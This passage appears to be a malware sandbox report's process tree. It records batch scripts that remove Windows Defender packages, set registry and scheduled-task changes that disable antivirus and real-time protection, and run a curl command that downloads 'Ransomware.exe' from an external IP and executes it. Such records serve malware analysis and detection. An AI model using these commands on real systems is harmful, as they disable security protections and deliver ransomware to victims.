        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:536
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4920
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:5088
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4368
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-MDM-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:1976
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:1252
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Nis-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:2308
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:2800
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:3972
        
        C:\Users\Admin\AppData\Local\Temp\C3DDCEE5-1943-4C63-85B8-14A4DA41626D\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\C3DDCEE5-1943-4C63-85B8-14A4DA41626D\dismhost.exe {41A544A1-7D4D-4E3B-ACF0-590E2B988BEF}
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:4648
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2308
        
        C:\Users\Admin\AppData\Local\Temp\328E945E-0539-4E64-BB33-2BC5A124FC11\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\328E945E-0539-4E64-BB33-2BC5A124FC11\dismhost.exe {06A4895C-72FB-41BA-97A4-726F8598502A}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4524
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1652
        
        C:\Users\Admin\AppData\Local\Temp\6B688609-C9DE-460B-8A4A-E49912157C57\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\6B688609-C9DE-460B-8A4A-E49912157C57\dismhost.exe {18264DD0-3365-41CB-A1DE-BB2947C8B71B}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:1476
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3692
        
        C:\Users\Admin\AppData\Local\Temp\ED96BDC9-6CAA-4367-9E20-DE87B2842C4F\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\ED96BDC9-6CAA-4367-9E20-DE87B2842C4F\dismhost.exe {B5820354-D3AD-4CBA-A20F-0DA0B6D41DFA}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:3932
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\06D215EF-4D88-4E78-B917-6D3D83A4BB58\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\06D215EF-4D88-4E78-B917-6D3D83A4BB58\dismhost.exe {CDB92F36-614D-49FC-9AD9-0A05838699BF}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:1516
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4108
        
        C:\Users\Admin\AppData\Local\Temp\CFAEB622-3B78-46A7-AEFD-07B7D47E153A\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\CFAEB622-3B78-46A7-AEFD-07B7D47E153A\dismhost.exe {9B822FF1-D7D3-455C-8071-B4FE0C44AB1D}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4600
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        
        PID:4072
        
        C:\Users\Admin\AppData\Local\Temp\BAFC7094-70AD-4518-985F-427AE543EE59\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\BAFC7094-70AD-4518-985F-427AE543EE59\dismhost.exe {FEFBE696-0A2B-4705-A591-BB28D48AFC91}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4764
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        
        PID:3892
        
        C:\Users\Admin\AppData\Local\Temp\37946F0F-DB6A-4D4F-8090-4A2739D78B84\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\37946F0F-DB6A-4D4F-8090-4A2739D78B84\dismhost.exe {D9BCED78-A0A8-4B6E-83F0-0202B024C05B}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:3640
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
        7⤵
        
        PID:3240
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender" /f
        7⤵
        
        PID:4920
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /k "C:\configuration\kill.bat"
        7⤵
        
        PID:620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\configuration\kill.bat" MY_FLAG
        8⤵
        
        PID:5116
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        9⤵
        
        PID:4828
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:3260
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:1872
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:4660
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:1256
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:3236
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:4464
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:4620
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:3036
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:2328
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:4856
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:4976
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        9⤵
        
        PID:3472
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:3836
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:4236
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
        9⤵
        
        PID:4692
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
        9⤵
        
        PID:3364
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
        9⤵
        
        PID:4076
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
        9⤵
        
        PID:1432
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
        9⤵
        
        PID:3932
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
        9⤵
        
        PID:3404
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        9⤵
        
        PID:4312
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        9⤵
        
        PID:4872
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        9⤵
        
        PID:4536
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        9⤵
        
        PID:4864
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:1840
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:2164
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:1044
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:2460
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /k C:\configuration\run.bat
        9⤵
        
        PID:3364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\configuration\run.bat" MY_FLAG
        10⤵
        
        PID:3004
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1
        11⤵
        
        PID:3120
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo j "
        11⤵
        
        PID:768
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        Modifies security service
        
        PID:4400
        
        C:\Windows\system32\curl.exe
        
        curl http://111.90.151.174:7777/Ransomware.exe -O
        7⤵
        
        PID:4704
        
        C:\configuration\Ransomware.exe
        
        Ransomware.exe
        7⤵
        Executes dropped EXE
        
        PID:752
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /k "C:\configuration\and.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2708
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\configuration\and.bat" MY_FLAG
        6⤵
        Drops startup file
        Suspicious use of WriteProcessMemory
        
        PID:4276
        
        C:\Windows\system32\cacls.exe
        
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        7⤵
        
        PID:4892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
        7⤵
        
        PID:4292
        
        C:\Windows\system32\reg.exe
        
        reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
        8⤵
        
        PID:2580
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.19041.1165_neutral_neutral_cw5n1h2txyewy" /f
        7⤵
        
        PID:3708
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        
        PID:4616
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        
        PID:2272
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        
        PID:3976
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4964
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3428
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3628
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:2328
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4732
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4620
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-CloudClean-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3092
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3704
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4788
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:1972
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:2444
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4080
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3284
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3648
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-MDM-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4892
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4916
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Nis-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4400
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3716
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4672
        
        C:\Users\Admin\AppData\Local\Temp\F8C321F9-C3D2-4F32-9EE5-41DFFA6C67A4\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\F8C321F9-C3D2-4F32-9EE5-41DFFA6C67A4\dismhost.exe {C2F5C21C-809D-42E4-BD90-0E877F674020}
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4744
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1748
        
        C:\Users\Admin\AppData\Local\Temp\924E8A31-5B81-49A8-BDDE-67FDECB8952B\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\924E8A31-5B81-49A8-BDDE-67FDECB8952B\dismhost.exe {A1E118A0-B00B-41EC-B6C6-2803EBA89AA8}
        8⤵
        Executes dropped EXE
        
        PID:2780
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4616
        
        C:\Users\Admin\AppData\Local\Temp\6520A76D-C7CC-4889-BCDC-0FA3DC5AF801\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\6520A76D-C7CC-4889-BCDC-0FA3DC5AF801\dismhost.exe {2F0F619B-94EC-4B5B-B900-64999268D25D}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:3972
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:532
        
        C:\Users\Admin\AppData\Local\Temp\14EC0539-A940-4DDD-A2C6-CF49A186D112\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\14EC0539-A940-4DDD-A2C6-CF49A186D112\dismhost.exe {D1D1A16B-F326-46EA-9D0B-2ACD8AF47269}
        8⤵
        Executes dropped EXE
        
        PID:1840
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\0D4A2B7C-E2EB-4219-A258-BDCED543635D\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\0D4A2B7C-E2EB-4219-A258-BDCED543635D\dismhost.exe {BF01AAF4-1EDD-4B15-A34A-493925EF1496}
        8⤵
        Executes dropped EXE
        
        PID:4328
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        
        PID:2088
        
        C:\Users\Admin\AppData\Local\Temp\063A7F95-A28B-4E3F-A8B9-99B4B005B214\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\063A7F95-A28B-4E3F-A8B9-99B4B005B214\dismhost.exe {A8851AFC-CE28-452C-992B-81B7903C5F77}
        8⤵
        Executes dropped EXE
        
        PID:4540
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        
        PID:1332
        
        C:\Users\Admin\AppData\Local\Temp\9005E699-C6A2-47B8-8C9F-F455810275D5\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\9005E699-C6A2-47B8-8C9F-F455810275D5\dismhost.exe {EB2C5B6A-1068-4E5F-9BD3-991557104EBB}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:1440
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        
        PID:2112
        
        C:\Users\Admin\AppData\Local\Temp\96BB2C71-8681-4C56-9BCD-CBF6A7E2EEE1\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\96BB2C71-8681-4C56-9BCD-CBF6A7E2EEE1\dismhost.exe {F7194039-968E-4799-887D-CC070B211DDA}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:5080
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
        7⤵
        
        PID:2508
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender" /f
        7⤵
        
        PID:4072
        
        C:\Windows\system32\curl.exe
        
        curl http://111.90.151.174:7777/Ransomware.exe -O
        7⤵
        
        PID:2980
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /k "C:\configuration\kill.bat"
        7⤵
        
        PID:3644
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\configuration\kill.bat" MY_FLAG
        8⤵
        
        PID:4420
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:3872
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:4556
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:804
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:3976
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:4864
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:2024
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:4772
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:4996
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
